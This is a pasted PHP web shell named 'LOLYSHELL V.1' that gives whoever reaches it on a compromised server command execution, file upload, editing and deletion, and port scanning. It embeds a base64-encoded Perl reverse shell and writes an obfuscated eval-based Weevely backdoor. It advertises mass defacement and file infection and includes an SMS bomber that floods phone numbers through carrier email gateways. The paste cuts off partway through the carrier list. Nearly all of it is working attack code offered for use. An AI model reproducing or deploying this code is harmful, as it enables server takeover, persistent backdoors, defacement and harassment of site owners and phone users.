· 8 years ago · Jul 28, 2018, 05:58 PM
1<html>
2<LINK rel="SHORTCUT ICON" href="https://3.bp.blogspot.com/-qfeAr7jKSK0/WsNmPE0HlPI/AAAAAAAAAYA/Y0tgaQ8Mlso_SD78ymIBXCB7T1O_Nh6-QCPcBGAYYCw/s320/d704.png">
3<body>
4<?php
5
6
7 $head = '
8<html>
9<head>
10</script>
11<title>D704T | LOLYSHELL V.1</title>
12<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
13
14<STYLE>
15body {
16 background-image: url(https://s33.postimg.cc/3pmuky07j/Wiki-background.jpg);
17 background-repeat: repeat-x repeat-y;
18 background-position: left top;
19 font-size: 14px;
20 background-attachment: fixed;
21font-family: sans;
22color: red;
23margin:0px 0px 0px 0px;
24}
25font-family: Courier New
26}
27tr {
28BORDER: line 1px #333;
29color: #FFF;
30}
31td {
32BORDER: line 1px #333;
33color: #FFF;
34}
35.table1 {
36BORDER: 0px Black;
37BACKGROUND-COLOR: Black;
38color: #FFF;
39}
40.td1 {
41BORDER: 0px;
42BORDER-COLOR: #333333;
43font: 7pt Verdana;
44color: White;
45}
46.tr1 {
47BORDER: 0px;
48BORDER-COLOR: #333333;
49color: #FFF;
50}
51table {
52BORDER: line 1px #333;
53BORDER-COLOR: #333333;
54BACKGROUND-COLOR: transparent;
55color: #FFF;
56}
57input {
58border : line 1px;
59border-color : #333;
60BACKGROUND-COLOR: #111111;
61font: 9pt Verdana;
62color: Red;
63}
64select {
65BORDER-RIGHT: black 1px solid;
66BORDER-TOP: #DF0000 1px solid;
67BORDER-LEFT: #DF0000 1px solid;
68BORDER-BOTTOM: Black 1px solid;
69BORDER-color: #FFF;
70BACKGROUND-COLOR: #111111;
71font: 8pt Verdana;
72color: Red;
73}
74submit {
75BORDER: buttonhighlight 2px outset;
76BACKGROUND-COLOR: #111111;
77width: 30%;
78color: #FFF;
79}
80textarea {
81border : line 1px #333;
82BACKGROUND-COLOR: #111111;
83font: Fixedsys bold;
84color: #999;
85}
86BODY {
87 SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
88margin: 1px;
89color: Red;
90background-color: #111111;
91}
92.main {
93margin : -287px 0px 0px -490px;
94BORDER: line 1px #333;
95BORDER-COLOR: #333333;
96}
97.tt {
98background-color: transparent;
99}
100
101A:link {
102 COLOR: White; TEXT-DECORATION: none
103}
104A:visited {
105 COLOR: White; TEXT-DECORATION: none
106}
107A:hover {
108 color: Red; TEXT-DECORATION: none
109}
110A:active {
111 color: Red; TEXT-DECORATION: none
112}
113</STYLE>
114<script language=\'javascript\'>
115function hide_div(id)
116{
117 document.getElementById(id).style.display = \'none\';
118 document.cookie=id+\'=0;\';
119}
120function show_div(id)
121{
122 document.getElementById(id).style.display = \'block\';
123 document.cookie=id+\'=1;\';
124}
125function change_divst(id)
126{
127 if (document.getElementById(id).style.display == \'none\')
128 show_div(id);
129 else
130 hide_div(id);
131}
132</script>'; ?>
133<?php
134error_reporting(0);
135#chdir('');
136//Some basic var's
137if (!@$_GET['path']) {
138 $dir = CleanDir(getcwd());
139} else {
140 $dir = CleanDir($_GET['path']);
141}
142$rootdir = CleanDir($_SERVER['DOCUMENT_ROOT']);
143$domain = $_SERVER['HTTP_HOST'];
144$script = $_SERVER['SCRIPT_NAME'];
145$full_url = $_SERVER['REQUEST_URI'];
146$script2 = basename($script);
147$serverip = $_SERVER['SERVER_ADDR'];
148$userip = $_SERVER['REMOTE_ADDR'];
149$whoami = function_exists("posix_getpwuid") ? posix_getpwuid(posix_geteuid()) : exec("whoami");
150$whoami = function_exists("posix_getpwuid") ? $whoami['name'] : exec("whoami");
151$disabled = ini_get('disable_functions');
152//Perl back connect script by LorD
153//Encoded in base64 for convenience
154$bcperl_source = "IyEvdXNyL2Jpbi9wZXJsIA0KdXNlIElPOjpTb2NrZXQ7IA0KIyAgIFByaXY4ICoqIFByaXY4ICoqIFByaXY4IA0KIyBJUkFOIEhBQ0tFUlMgU0FCT1RBR0UgQ29ubmVjdCBCYWNrIFNoZWxsICAgICAgICAgIA0KIyBjb2RlIGJ5OkxvckQgDQojIFdlIEFyZSA6TG9yRC1DMGQzci1OVC1ceDkwICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCiMgRW1haWw6TG9yREBpaHN0ZWFtLmNvbSANCiMgDQojbG9yZEBTbGFja3dhcmVMaW51eDovaG9tZS9wcm9ncmFtaW5nJCBwZXJsIGRjLnBsIA0KIy0tPT0gQ29ubmVjdEJhY2sgQmFja2Rvb3IgU2hlbGwgdnMgMS4wIGJ5IExvckQgb2YgSVJBTiBIQUNLRVJTIFNBQk9UQUdFID09LS0gDQojIA0KI1VzYWdlOiBkYy5wbCBbSG9zdF0gW1BvcnRdIA0KIyANCiNFeDogZGMucGwgMTI3LjAuMC4xIDIxMjEgDQojbG9yZEBTbGFja3dhcmVMaW51eDovaG9tZS9wcm9ncmFtaW5nJCBwZXJsIGRjLnBsIDEyNy4wLjAuMSAyMTIxIA0KIy0tPT0gQ29ubmVjdEJhY2sgQmFja2Rvb3IgU2hlbGwgdnMgMS4wIGJ5IExvckQgb2YgSVJBTiBIQUNLRVJTIFNBQk9UQUdFID09LS0gDQojIA0KI1sqXSBSZXNvbHZpbmcgSG9zdE5hbWUgDQojWypdIENvbm5lY3RpbmcuLi4gMTI3LjAuMC4xIA0KI1sqXSBTcGF3bmluZyBTaGVsbCANCiNbKl0gQ29ubmVjdGVkIHRvIHJlbW90ZSBob3N0IA0KDQojYmFzaC0yLjA1YiMgbmMgLXZ2IC1sIC1wIDIxMjEgDQojbGlzdGVuaW5nIG9uIFthbnldIDIxMjEgLi4uIA0KI2Nvbm5lY3QgdG8gWzEyNy4wLjAuMV0gZnJvbSBsb2NhbGhvc3QgWzEyNy4wLjAuMV0gMzI3NjkgDQojLS09PSBDb25uZWN0QmFjayBCYWNrZG9vciB2cyAxLjAgYnkgTG9yRCBvZiBJUkFOIEhBQ0tFUlMgU0FCT1RBR0UgPT0tLSANCiMgDQojLS09PVN5c3RlbWluZm89PS0tIA0KI0xpbnV4IFNsYWNrd2FyZUxpbnV4IDIuNi43ICMxIFNNUCBUaHUgRGVjIDIzIDAwOjA1OjM5IElSVCAyMDA0IGk2ODYgdW5rbm93biB1bmtub3duIEdOVS9MaW51eCANCiMgDQojLS09PVVzZXJpbmZvPT0tLSANCiN1aWQ9MTAwMShsb3JkKSBnaWQ9MTAwKHVzZXJzKSBncm91cHM9MTAwKHVzZXJzKSANCiMgDQojLS09PURpcmVjdG9yeT09LS0gDQojL3Jvb3QgDQojIA0KIy0tPT1TaGVsbD09LS0gDQojIA0KJHN5c3RlbSAgID0gJy9iaW4vYmFzaCc7IA0KJEFSR0M9QEFSR1Y7IA0KcHJpbnQgIklIUyBCQUNLLUNPTk5FQ1QgQkFDS0RPT1JcblxuIjsgDQppZiAoJEFSR0MhPTIpIHsgDQogICBwcmludCAiVXNhZ2U6ICQwIFtIb3N0XSBbUG9ydF0gXG5cbiI7IA0KICAgZGllICJFeDogJDAgMTI3LjAuMC4xIDIxMjEgXG4iOyANCn0gDQp1c2UgU29ja2V0OyANCnVzZSBGaWxlSGFuZGxlOyANCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCBnZXRwcm90b2J5bmFtZSgndGNwJykpIG9yIGRpZSBwcmludCAiWy1dIFVuYWJsZSB0byBSZXNvbHZlIEhvc3RcbiI7IA0KY29ubmVjdChTT0NLRVQsIHNvY2thZGRyX2luKCRBUkdWWzFdLCBpbmV0X2F0b24oJEFSR1ZbMF0pKSkgb3IgZGllIHByaW50ICJbLV0gVW5hYmxlIHRvIENvbm5lY3QgSG9zdFxuIjsgDQpwcmludCAiWypdIFJlc29sdmluZyBIb3N0TmFtZVxuIjsgDQpwcmludCAiWypdIENvbm5lY3RpbmcuLi4gJEFSR1ZbMF0gXG4iOyANCnByaW50ICJbKl0gU3Bhd25pbmcgU2hlbGwgXG4iOyANCnByaW50ICJbKl0gQ29ubmVjdGVkIHRvIHJlbW90ZSBob3N0IFxuIjsgDQpTT0NLRVQtPmF1dG9mbHVzaCgpOyANCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOyANCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOyANCm9wZW4oU1RERVJSLCI+JlNPQ0tFVCIpOyANCnByaW50ICJJSFMgQkFDSy1DT05ORUNUIEJBQ0tET09SICBcblxuIjsgDQpzeXN0ZW0oInVuc2V0IEhJU1RGSUxFOyB1bnNldCBTQVZFSElTVCA7ZWNobyAtLT09U3lzdGVtaW5mbz09LS0gOyB1bmFtZSAtYTtlY2hvOyANCmVjaG8gLS09PVVzZXJpbmZvPT0tLSA7IGlkO2VjaG87ZWNobyAtLT09RGlyZWN0b3J5PT0tLSA7IHB3ZDtlY2hvOyBlY2hvIC0tPT1TaGVsbD09LS0gIik7IA0Kc3lzdGVtKCRzeXN0ZW0pOyANCiNFT0Y=";
155@ini_set("memory_limit", "9999M");
156@ini_set("max_execution_time", "0");
157@ini_set("upload_max_filesize", "9999m");
158@ini_set("magic_quotes_gpc", "0");
159@set_magic_quotes_runtime(0);
160set_time_limit(0);
161if (empty($disabled)) {
162 $disabled = "None";
163}
164//Some functions
165function CleanDir($directory) {
166 $directory = str_replace("\\", "/", $directory);
167 $directory = str_replace("//", "/", $directory);
168 return $directory;
169}
170function success($for, $var1) {
171 $domain = $_SERVER['HTTP_HOST'];
172 $script = $_SERVER['SCRIPT_NAME'];
173 $full_url = $_SERVER['REQUEST_URI'];
174 if ($for == "filesave") {
175 $message = "File Saved!";
176 $redirect = "http://$domain$script?path=$var1";
177 }
178 if ($for == "filedelete") {
179 $message = "File Deleted!";
180 $redirect = "http://$domain$script?path=$var1";
181 }
182 if ($for == "createdir") {
183 $message = "Directory Created!";
184 $redirect = "http://$domain$script?path=$var1";
185 }
186 if ($for == "dir_exists") {
187 $message = "Directory Already Exists!";
188 $redirect = "http://$domain$script?path=$var1";
189 }
190 if ($for == "file_exists") {
191 $message = "File Already Exists!";
192 $redirect = "http://$domain$script?editfile=$var1";
193 }
194 if ($for == "file_created") {
195 $message = "File Created!";
196 $redirect = "http://$domain$script?editfile=$var1";
197 }
198 if ($for == "file_uploaded") {
199 $message = "File Uploaded!";
200 $redirect = "http://$domain$full_url";
201 }
202 if ($for == "shell_killed") {
203 $message = "Shell Killed!";
204 $redirect = "http://$domain$script";
205 }
206 if ($for == "dir_del") {
207 $message = "Directory Deleted!";
208 $redirect = "http://$domain$script?path=$var1";
209 }
210 if ($for == "dir_renamed") {
211 $message = "Directory Renamed!";
212 $redirect = "http://$domain$script?path=$var1";
213 }
214 if ($for == "file_renamed") {
215 $message = "File Renamed!";
216 $redirect = "http://$domain$script?path=$var1";
217 }
218 if ($for == "configs_found") {
219 $message = "$var1 Configs Found!";
220 $redirect = "";
221 }
222 if ($for == "unzip") {
223 $message = "Successfully Unzipped File!";
224 $redirect = "http://$domain$script?path=$var1";
225 }
226 if ($for == "files_found") {
227 $message = "$var1 files found!";
228 $redirect = "";
229 }
230 if ($for == "weevely") {
231 $message = "Weevely BackDoor Installed!";
232 $redirect = "";
233 }
234 echo "<div id='xbox'><embed
235 src='http://p0wersurge.com/js/achievementnopic.swf'
236 width='300'
237 height='80'
238 flashvars='Text=$message&gs=1337'
239 wmode='transparent'/></div>";
240 if (empty($redirect)) {
241 echo "<script>
242function remove (){
243 document.getElementById('xbox').innerHTML='';
244}
245setInterval(function(){remove();}, 2700);
246</script>";
247 } else {
248 echo "<script>
249function remove (){
250 window.location = '$redirect'
251}
252setInterval(function(){remove();}, 2500);
253</script>";
254 }
255}
256function error($mesg) {
257 $error = "<center><font size='4' color='red'><b>$mesg</b></font></center>";
258 echo "$error";
259}
260function ByteConversion($bytes, $precision = 2) {
261 $kilobyte = 1024;
262 $megabyte = $kilobyte * 1024;
263 $gigabyte = $megabyte * 1024;
264 $terabyte = $gigabyte * 1024;
265 if (($bytes >= 0) && ($bytes < $kilobyte)) {
266 return $bytes . ' B';
267 } elseif (($bytes >= $kilobyte) && ($bytes < $megabyte)) {
268 return round($bytes / $kilobyte, $precision) . ' KB';
269 } elseif (($bytes >= $megabyte) && ($bytes < $gigabyte)) {
270 return round($bytes / $megabyte, $precision) . ' MB';
271 } elseif (($bytes >= $gigabyte) && ($bytes < $terabyte)) {
272 return round($bytes / $gigabyte, $precision) . ' GB';
273 } elseif ($bytes >= $terabyte) {
274 return round($bytes / $terabyte, $precision) . ' TB';
275 } else {
276 return $bytes . ' B';
277 }
278}
279//Mass File Function
280function files($mass_dir) {
281 if ($dh = opendir($mass_dir)) {
282 $files = array();
283 $inner_files = array();
284 while ($file = readdir($dh)) {
285 if ($file != "." && $file != ".." && $file[0] != '.') {
286 if (is_dir($mass_dir . "/" . $file)) {
287 $inner_files = files("$mass_dir/$file");
288 if (is_array($inner_files)) $files = array_merge($files, $inner_files);
289 } else {
290 array_push($files, "$mass_dir/$file");
291 }
292 }
293 }
294 closedir($dh);
295 return $files;
296 }
297}
298//Upload File
299if (isset($_POST['do_upload_file'])) {
300 $udir = $_POST['upload_location'];
301 $uname = $_FILES['upload_file']['name'];
302 $both = "$udir$uname";
303 if (file_exists($both)) {
304 success("file_exists", $both);
305 } else {
306 switch ($_FILES['upload_file']['error']) {
307 case 0:
308 if (@move_uploaded_file($_FILES['upload_file']['tmp_name'], $udir . '/' . $uname)) {
309 success("file_uploaded");
310 } else {
311 error("Failed To Upload File!");
312 }
313 }
314 }
315}
316//wget file
317if (isset($_POST['do_wget_file'])) {
318 $wget_file = $_POST['wget_file'];
319 $wecmd = "wget $wget_file";
320 $wget_ecmd = cmd2($wecmd, $dir);
321 echo "<center><font color='#14ab00'>
322Result:<br>
323<textarea rows='20' cols='150' name='massdeface_source' style='color:#000'>
324$wget_ecmd
325</textarea></font></center><br><br>";
326}
327//Execute command
328function cmd2($cmd, $path) {
329 chdir($path);
330 $disabled = ini_get('disable_functions');
331 if (empty($disabled)) {
332 $disabled = "None";
333 }
334 if ($disabled == "None") {
335 $execute = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
336 while (!feof($io[1])) {
337 $res.= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
338 }
339 while (!feof($io[2])) {
340 $res.= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
341 }
342 fclose($io[1]);
343 fclose($io[2]);
344 proc_close($execute);
345 return $res;
346 } elseif (function_exists("proc_open")) {
347 $execute = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
348 while (!feof($io[1])) {
349 $res.= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
350 }
351 while (!feof($io[2])) {
352 $res.= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
353 }
354 fclose($io[1]);
355 fclose($io[2]);
356 proc_close($execute);
357 return $res;
358 } elseif (function_exists("exec")) {
359 $res = exec($cmd);
360 return $res;
361 } elseif (function_exists("system")) {
362 $res = system($cmd);
363 return $res;
364 } elseif (function_exists("shell_exec")) {
365 $res = shell_exec($cmd);
366 return $res;
367 } elseif (function_exists("passthru")) {
368 $res = passthru($cmd);
369 return $res;
370 } else {
371 error("The necessary functions to execute commands are disabled!");
372 }
373}
374//Unzip function
375function unzip($filename, $directory) {
376 $zip = new ZipArchive;
377 $res = $zip->open($filename);
378 if ($res === TRUE) {
379 $zip->extractTo($directory);
380 $zip->close();
381 success("unzip", $directory);
382 } else {
383 cmd2("unzip $filename", $directory);
384 }
385}
386//Get files and directories and throw them into an array.
387$open = opendir($dir);
388$files = array();
389$direcs = array();
390while ($file = readdir($open)) {
391 if ($file != "." && $file != "..") {
392 if (is_dir("$dir/$file")) {
393 array_push($direcs, $file);
394 } else {
395 array_push($files, $file);
396 }
397 }
398}
399asort($direcs);
400asort($files);
401?>
402<html>
403<head>
404<?php
405 echo $head ;
406 echo '
407
408<table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
409
410
411<center>
412<img src="https://3.bp.blogspot.com/-qfeAr7jKSK0/WsNmPE0HlPI/AAAAAAAAAYA/Y0tgaQ8Mlso_SD78ymIBXCB7T1O_Nh6-QCPcBGAYYCw/s320/d704.png" width="295" height="275">
413
414
415 <td width="100%" align=center valign="top" rowspan="1">
416 <font color=red size=8 face="Wallpoet"><b>D704T</font><font color=white size=8 face="Wallpoet"><b> |</font><font color=Blue size=8 face="Wallpoet"><b> LOLYSHELL V.1 </font> <div class="hedr">
417
418 <td height="10" align="left" class="td1"></td></tr><tr><td
419 width="100%" align="center" valign="top" rowspan="1"><font
420 color="red" face="comic sans ms"size="3"><b>
421 <font color=red>
422
423
424
425 WELCOME TO D704T | LOLYSHELL V.1
426
427 </table>
428
429
430
431';
432
433?>
434<h3 style="text-align:center"><font color=red size=2 face="comic sans ms"><div align=center><table><tr><td>D704T | LOLYSHELL V.1</font><br></td></tr></table>
435</head>
436<p></p>
437<p></p>
438<body bgcolor="red"><body bgcolor="red">
439<table border=1 width=100%><td width=15% align=right><font color=white size=2 face="comic sans ms">uname<br>server_ip<br>your_ip<br>server_software<br>disabled_functions</td><td><?php echo "<font size=2>".php_uname() ;?> <br><?php echo "<font size=2>".gethostbyname($_SERVER["HTTP_HOST"]);?><br><?php echo $_SERVER['REMOTE_ADDR'];?><br><?php echo $s_software = getenv("SERVER_SOFTWARE"); ?><br><?php $r=ini_get('disable_functions') ? ini_get('disable_functions'):'none'; echo $r;?>
440</table><?php echo $head ; ?><table width=100%><tr><td align=center width=60%>
441</table>
442<center><div id="menu">
443<a href="<?php echo '?'?>"><font size=4 face="Wallpoet" color=cyan> [Home] </font></a>
444<a href="<?php echo '?perlbackconnect';?>"><font size=4 face="Wallpoet" color=cyan> [Perl Back Connect] </font></a>
445<a href="<?php echo '?pythonbackconnect'?>"><font size=4 face="Wallpoet" color=cyan> [Python Back connect] </font></a>
446<a href="<?php echo '?encrypt';?>"><font size=4 face="Wallpoet" color=cyan> [Encrypt] </font></a>
447<a href="<?php echo '?massdeface'?>"><font size=4 face="Wallpoet" color=cyan> [Mass Deface] </font></a>
448<a href="<?php echo '?massinfect';?>"><font size=4 face="Wallpoet" color=cyan> [Mass File Infect] </font></a>
449<a href="<?php echo '?installMySQL'?>"><font size=4 face="Wallpoet" color=cyan> [Install MSD] </font></a>
450<p></p>
451<a href="<?php echo '?sms';?>"><font size=4 face="Wallpoet" color=cyan> [SMS Bomber] </font></a>
452<a href="<?php echo '?domaininfo'?>"><font size=4 face="Wallpoet" color=cyan> [Reverse IP] </font></a>
453<a href="<?php echo '?weev';?>"><font size=4 face="Wallpoet" color=cyan> [Weevely Backdoor] </font></a>
454<a href="<?php echo '?scan'?>"><font size=4 face="Wallpoet" color=cyan> [Port Scan] </font></a>
455</div></center>
456<p></p>
457<p></p>
458<p></p>
459<?php
460if (isset($_GET['encrypt'])) {
461 echo "<form action='' method='post'>
462<center><font color='#14ab00'>
463<input type='text' name='en_string' class='text'>
464<input type='submit' name='do_encrypt' value='Encrypt String'>
465</form>
466</font></center>";
467}
468if (isset($_POST['do_encrypt'])) {
469 $vbsalt = gen_salt("30");
470 $vbsalt2 = gen_salt("3");
471 $mybbsalt = gen_salt("8");
472 $ipbsalt = gen_salt("5");
473 $joomlasalt = gen_salt("32");
474 $password = $_POST['en_string'];
475 $md5 = md5($password);
476 $md52 = md5(md5($password));
477 $md53 = md5(md5(md5($password)));
478 $sha1 = sha1($password);
479 $sha256 = hash('sha256', $password);
480 $vbalg = md5(md5($password) . $vbsalt);
481 $vbalg2 = md5(md5($password) . $vbsalt2);
482 $mybbalg = md5(md5($mybbsalt) . $password);
483 $ipbalg = md5(md5($ipbsalt) . md5($password));
484 $joomlaalg = md5($password . $joomlasalt);
485 $en_result = "Hashes for string: $password\nMD5: $md5\nmd5(md5(pass)): $md52\nmd5(md5(md5(pass))): $md53\nSHA-1: $sha1\nSHA-256: $sha256\nvBulletin 4: $vbalg:$vbsalt\nvBulletin 3: $vbalg2:$vbsalt2\nMyBB: $mybbalg:$mybbsalt\nIPB: $ipbalg:$ipbsalt\nJoomla 1.0.13+: $joomlaalg:$joomlasalt\n";
486 echo "<center>
487<textarea rows='20' cols='150' style='color:#00ff00'>
488$en_result
489</textarea>
490</center><br>";
491}
492?>
493<?php
494//Port scan
495if (isset($_GET['scan'])) {
496 echo "<center><font color='#14ab00' size='3'>
497Port Scan:<br>
498<form action='' method='post'>
499Host: <input type='text' name='scan_host' class='text' value='$domain'><br>
500Start port: <input type='text' name='start_port' class='text' size='6'>
501End port: <input type='text' name='end_port' class='text' size='7'><br>
502<input type='submit' name='start_scan' value='Scan'>
503</form>
504</font>
505</center>";
506}
507if (isset($_POST['start_scan'])) {
508 $scanhost = $_POST['scan_host'];
509 $startport = $_POST['start_port'];
510 $endport = $_POST['end_port'];
511 while ($startport <= $endport) {
512 if (fsockopen($scanhost, $startport, $errno, $errstr, 3)) {
513 echo "<font color='green' size='3'>Port $startport is open on $scanhost</font><br>";
514 } else {
515 echo "<font color='red' size='3'>Port $startport is not open on $scanhost</font><br>";
516 }
517 $startport++;
518 }
519}
520?>
521<?php
522//Edit file stuff
523if (!empty($_GET['editfile'])) {
524 $edfile = $_GET['editfile'];
525 $redirectloc = dirname($edfile);
526 echo "<form method='POST'><center>";
527 if (file_exists($edfile)) {
528 if (get_magic_quotes_gpc()) {
529 $file_content = htmlspecialchars(stripslashes(file_get_contents($edfile)));
530 } else {
531 $file_content = htmlspecialchars(file_get_contents($edfile));
532 }
533 if (is_writeable($edfile)) {
534 echo "<textarea rows='20' cols='150' name='edfile_contents' style='color:#00ff00'>$file_content</textarea>
535<br><br>
536 <input type='submit' name='savedit' value='Save' />
537 <input type='submit' name='deletefile' value='Delete' />
538 </form></center>";
539 if (isset($_POST['savedit'])) {
540 if (get_magic_quotes_gpc()) {
541 $edfilecontent = stripslashes($_POST['edfile_contents']);
542 } else {
543 $edfilecontent = $_POST['edfile_contents'];
544 }
545 if (file_put_contents($edfile, $edfilecontent)) {
546 success("filesave", rtrim($redirectloc, "/"));
547 } else {
548 error("Failed to save file!");
549 }
550 } else if (isset($_POST['deletefile'])) {
551 if (unlink($edfile)) {
552 success("filedelete", rtrim($redirectloc, '/'));
553 } else {
554 error("Failed to delete file!");
555 }
556 }
557 } else {
558 echo "<font color='red'><b>File is read only!</b></font><br>
559<textarea readonly rows='20' cols='150' name='edfile_contents'>$file_content</textarea><br><br>";
560 }
561 echo "</center>";
562 } else {
563 echo "<form method='POST'><center>";
564 echo "<font color='red'><b>File does not exist!</b></font><br>
565<textarea rows='20' cols='150' name='newfile_contents' style='color:#00ff00'>
566</textarea><br><br>
567 <input type='submit' name='savefile' value='Create File' /><br /><br />
568 </form></center>";
569 if (isset($_POST['savefile'])) {
570 if (get_magic_quotes_gpc()) {
571 $newfilecontent = stripslashes($_POST['newfile_contents']);
572 } else {
573 $newfilecontent = $_POST['newfile_contents'];
574 }
575 if (file_put_contents($edfile, $newfilecontent)) {
576 success("filesave", rtrim($redirectloc, "/"));
577 } else {
578 error("Failed to save file!");
579 }
580 }
581 }
582}
583?>
584<?php
585//Weevely backdoor
586if (isset($_GET['weev'])) {
587 echo "<center><font color='#14ab00' size='3'>
588<form action='' method='post'>
589Directory to install weevely backdoor:<br>
590<input type='text' name='weev_dir' size='50' class='text' value='$dir'><br>
591Name of file (something .php):<br>
592<input type='text' name='weev_name' class='text' value='weevely.php'><br>
593Password (more than 3 characters):<br>
594<input type='text' name='weev_pass' class='text'><br>
595<input type='submit' name='install_weev' value='BackDoor'><br>
596</font>
597</center>";
598}
599if (isset($_POST['install_weev'])) {
600 $weevdir = rtrim($_POST['weev_dir'], '/');;
601 $weevname = $_POST['weev_name'];
602 $weevpassword = $_POST['weev_pass'];
603 if (strlen($weevpassword) < 3) {
604 error("Password must be longer than 3 characters!");
605 } else {
606 $first2 = $weevpassword[0] . $weevpassword[1];
607 $rest = substr($weevpassword, 2);
608 $money = "$";
609 $weevelybd1 = base64_decode('ZnVuY3Rpb24gd2VldmVseSgpIHsNCiRjPSdjb3VudCc7DQokYT0kX0NPT0tJRTs=');
610 $weevelybd2 = "if(reset($money" . "a)=='" . $first2 . "' && $money" . "c($money" . "a)>3) {";
611 $weevelybd3 = "$money" . "k='$rest';";
612 $weevelybd4 = base64_decode('ZWNobyAnPCcuJGsuJz4nOw0KZXZhbChiYXNlNjRfZGVjb2RlKHByZWdfcmVwbGFjZShhcnJheSgnL1teXHc9XHNdLycsJy9ccy8nKSwgYXJyYXkoJycsJysnKSwgam9pbihhcnJheV9zbGljZSgkYSwkYygkYSktMykpKSkpOw0KZWNobyAnPC8nLiRrLic+JzsNCn0NCn0NCndlZXZlbHkoKTs=');
613 $all = "<?php\neval(base64_decode('" . base64_encode($weevelybd1 . $weevelybd2 . $weevelybd3 . $weevelybd4) . "'));\n?>";
614 if (file_put_contents($weevdir . '/' . $weevname, $all)) {
615 echo "<center><font color='#14ab00' size='3'>Usage: weevely [URL of backdoor] [password]</font></center><br>";
616 success("weevely");
617 } else {
618 error("Failed to write backdoor to $weevdir");
619 }
620 }
621}
622?>
623<?php
624//Domain information
625//Get domains hosted on server from yougetsignal.com
626if (isset($_GET['domaininfo'])) {
627 echo "<font color='#14ab00' size='3'>";
628 $dns_record = dns_get_record($domain, DNS_ANY, $authns, $addtl);
629 $num = 0;
630 $count = sizeof($dns_record);
631 echo "<br></b><br>";
632 while ($num < $count) {
633 $name_servers = $dns_record[$num];
634 $name_servers2 = $name_servers['type'];
635 $name_servers3 = @$name_servers['target'];
636 $num++;
637 if ($name_servers2 == "NS") {
638 echo "$name_servers3<br>";
639 $nshost = @$name_servers['host'];
640 }
641 if ($name_servers2 == "SOA") {
642 $nsemail = $name_servers['rname'];
643 }
644 if ($name_servers2 == "A") {
645 $nsip = $name_servers['ip'];
646 }
647 }
648 $num = 0;
649 echo "<br><table class='noborder'>
650</table><br>";
651 $domains_on_server = json_decode(file_get_contents("http://www.yougetsignal.com/tools/web-sites-on-web-server/php/testing.php?remoteAddress=$domain"));
652 $status = $domains_on_server->status;
653 $message = $domains_on_server->message;
654 $domainAr = $domains_on_server->domainArray;
655 $num_of_site = $domains_on_server->domainCount;
656 $count = sizeof($domainAr);
657 if ($status == "Success") {
658 echo "Found $num_of_site sites hosted on the same server as $nshost($nsip) via <a class='navbar' href='http://www.yougetsignal.com/tools/web-sites-on-web-server/'>www.yougetsignal.com</a>:<br><br> <table class='noborder'>";
659 while ($num < $count) {
660 $hossites = $domainAr[$num];
661 $num++;
662 $hossites3 = $domainAr[$num];
663 $hossites3 = $hossites3[0];
664 $hossites = $hossites[0];
665 $site_ips = empty($hossites) ? "" : "(" . gethostbyname($hossites) . ")";
666 $site_ips2 = empty($hossites3) ? "" : "(" . gethostbyname($hossites3) . ")";
667 echo "<tr><td><a class='navbar' href='http://$hossites'>$hossites</a> $site_ips</td><td><a class='navbar' href='http://$hossites3'>$hossites3</a> $site_ips2</td></tr>";
668 $num++;
669 }
670 echo "</table><br>";
671 $num = 0;
672 } else {
673 error("Failed to find or get sites hosted on same server from: <a class='navbar' href='http://www.yougetsignal.com/tools/web-sites-on-web-server/'>www.yougetsignal.com</a>!<br>Additional Message:<br>$message");
674 }
675 echo "</font><br>";
676}
677?>
678<?php
679//SMS Bomber stuff
680if (isset($_POST['do_bomb_sms'])) {
681 $phonenum = $_POST['phnumber'];
682 $carrier = $_POST['carrier'];
683 $amount = $_POST['numberof'];
684 $from = $_POST['from'];
685 $headers = "From: $from\r\n";
686 $headers.= 'MIME-Version: 1.0' . "\n";
687 $headers.= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
688 $subject = $_POST['subject'];
689 $to = "$phonenum$carrier";
690 $numsent = 0;
691 $sent_fail = 0;
692 $sent_success = 0;
693 $msgcontent = $_POST['message_content'];
694 if (empty($phonenum) OR empty($amount) OR empty($from) OR empty($subject) OR empty($msgcontent)) {
695 error("All Fields Must Entered!");
696 } else {
697 while ($numsent < $amount) {
698 if (!@mail($to, $subject, $msgcontent, $headers)) {
699 $numsent++;
700 $sent_fail++;
701 } else {
702 $numsent++;
703 $sent_success++;
704 }
705 }
706 echo "<font color='#14ab00'>Successfully sent $sent_success messages.<br>
707Failed to send $sent_fail messages.<br>";
708 }
709}
710if (isset($_GET['sms'])) {
711 echo "<font color='#14ab00'>
712<table class='noborder'>
713<tr>
714<form action='' method='post'>
715<td>Phone Number With Area Code</td>
716<td><input type='text' name='phnumber' class='text'></td>
717</tr>
718<tr>
719<td>Carrier:</td>
720<td>
721<select name='carrier'>
722<option value='@sms.3rivers.net'>3 River Wireless</option>
723<option value='@paging.acswireless.com'>ACS Wireless</option>
724<option value='@advantagepaging.com'>Advantage Communications</option>
725<option value='@airtelkk.com'>Airtel (Karnataka, India)</option>
726<option value='@sms.airtelmontana.com'>Airtel Wireless (Montana, USA)</option>
727<option value='@airtouch.net'>Airtouch Pagers</option>
728<option value='@airtouchpaging.com'>Airtouch Pagers</option>
729<option value='@alphapage.airtouch.com'>Airtouch Pagers</option>
730<option value='@myairmail.com'>Airtouch Pagers</option>
731<option value='@msg.acsalaska.com'>Alaska Communications Systems</option>
732<option value='@message.alltel.com'>Alltel</option>
733<option value='@alphanow.net'>AlphaNow</option>
734<option value='@page.americanmessaging.net'>American Messaging</option>
